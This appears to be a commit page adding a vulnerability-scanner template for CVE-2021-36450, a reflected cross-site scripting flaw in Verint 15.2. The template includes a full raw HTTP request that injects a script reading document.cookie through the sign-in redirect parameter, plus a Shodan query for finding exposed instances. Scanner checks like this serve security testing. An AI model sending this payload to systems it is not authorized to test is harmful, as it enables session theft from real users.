Add CVE-2021-36450.yaml
parent
0bece54ed2
commit
def429e927
|
@ -0,0 +1,51 @@
|
|||
id: CVE-2021-36450
|
||||
|
||||
info:
|
||||
name: Verint 15.2 XSS
|
||||
author: atomiczsec
|
||||
severity: medium
|
||||
description: F Verint 15.2 (15.2.8.10048) Cross Site Scripting (XSS)
|
||||
reference:
|
||||
- https://medium.com/@1nf0sk/cve-2021-36450-cross-site-scripting-xss-6f5d8d7db740
|
||||
- https://sushantvkamble.blogspot.com/2021/11/cross-site-scripting-xss.html
|
||||
metadata:
|
||||
shodan-query: title:"Verint Sign-in"
|
||||
classification:
|
||||
cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:N
|
||||
cvss-score: 4.3
|
||||
cve-id: CVE-2021-36450
|
||||
cwe-id: CWE-79
|
||||
|
||||
tags: cve,cve2021,xss
|
||||
requests:
|
||||
- raw:
|
||||
- |-
|
||||
POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%26 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cookie: BIGipServer~WFO~WFO_VERINTAPP_HTTPS=1008015114.47873.0000; TS019568ef=012ae9fa175730d8c6833bc61a72737e509d8e4e11353b3e5616f302159403288a8010f798cf861e68949a5e2ab28fa9e5cabe247e; JSESSIONID=6j_0IpQrt2_52N1gIC6eGXNeMrla5evPz-az1EdLYZJI1XrS3NSg!-1403817999
|
||||
Content-Length: 155
|
||||
Cache-Control: max-age=0
|
||||
Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="100"
|
||||
Sec-Ch-Ua-Mobile: ?0
|
||||
Sec-Ch-Ua-Platform: "Windows"
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Origin: https://verint11.five9-wfo.com
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Sec-Fetch-Site: same-origin
|
||||
Sec-Fetch-Mode: navigate
|
||||
Sec-Fetch-User: ?1
|
||||
Sec-Fetch-Dest: document
|
||||
Referer: https://verint11.five9-wfo.com/wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%26
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Connection: close
|
||||
|
||||
browserCheckEnabled=true&username=TEST&language=en_US&defaultHttpPort=-1&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- class="loginUserNameText">TEST
|
Loading…
Reference in New Issue